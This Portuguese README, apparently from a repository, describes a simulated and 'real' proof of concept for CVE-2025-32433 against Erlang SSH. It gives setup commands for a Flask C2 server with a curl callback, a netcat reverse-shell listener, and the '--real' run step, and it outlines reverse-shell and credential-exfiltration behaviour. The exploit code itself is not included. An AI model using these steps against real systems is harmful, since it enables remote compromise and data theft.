
Exploit de prova de conceito para CVE-2025-32433 com modos de ataque simulados e reais, incluindo um servidor C2 baseado em Flask para callbacks de reverse shell e simulação de pós-exploração.
Este repositório contém código que demonstra um CVE real (CVE-2025-32433).
Use-o apenas em ambientes onde você tenha autorização explícita.
Nunca teste este exploit contra sistemas que você não possui ou gerencia.
O uso não autorizado é ilegal, antiético e prejudicial à comunidade de cibersegurança.
POC simulado e real para CVE-2025-32433
Meu amigo Chocapikk me mostrou este POC encontrado erling_cve.py, fiquei intrigado e quis testá-lo em um ambiente seguro.
você tem duas opções com este repositório. o script simulado seguro e o sistema que descrevo abaixo.
ou você pode utilizar o verdadeiro erling_cve.py (de forma ética, com cautela e apenas em redes que você tem permissão para testar)
antes de usar esta ferramenta para testar ou executar um exploit real, confira meu amigo m0usemm0use e seu script Python para encontrar alvos vulneráveis do CVE-2025-32433!!!!
https://github.com/m0usem0use/erl_mouse
Versão SIMULADA do exploit para CVE-2025-32433
Configurar o Servidor C2
construir um C2 baseado em Python Flask : poderoso para callbacks de bots ou reverse shells.
Execute este script de configuração no servidor C2
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (cole o script c2_server e edite conforme necessário)
execute
python3 c2_server.py
bots (ou scripts de teste) podem fazer curl para casa assim
curl -X POST http://:8080/report -d "Bot is online"
Configurar Python venv no Kali
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
Criar um ambiente virtual Python
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
Testar o Callback
nano test_callback.py (cole o script test_callback e edite conforme necessário)
execute o callback
python3 test_callback.py
Você agora oficialmente tem
Um venv funcional
Um C2 em nuvem ativo
Injeção de callback funcional
-Você precisa que a máquina alvo/vítima tenha um processo ou serviço Erlang exposto (ou simulado)
O QUE FAZ O erling_cve.py?
Conecta à porta 22 de um IP alvo
Envia uma string de versão SSH falsa
Envia um pacote malicioso (provavelmente para desencadear uma vulnerabilidade — fingindo abusar de algo como o manipulador SSH não documentado do Erlang ou um buffer overflow)
Dispara um reverse shell de volta ao IP do atacante
Simula pós-exploração executando comandos como whoami, uname, e falsa "exfiltração de credenciais" para /tmp/exfil.log
Pegaremos nosso PoC encontrado (tipo Erlang) e
Torná-lo funcional dentro do venv do Kali
Conectá-lo para reportar ao nosso C2 em nuvem quando o "ataque" for executado
Executá-lo de forma ética e segura dentro de um laboratório controlado
Observá-lo gerar /tmp/exfil.log para simular dados roubados
a partir da máquina Kali
nano poc_erlang_test.py
-cole o poc_erlang_test.py e edite conforme necessário
Abrir um Listener
em um novo terminal execute
nc -lvnp 4444
execute poc
python poc_erlang_test.py --real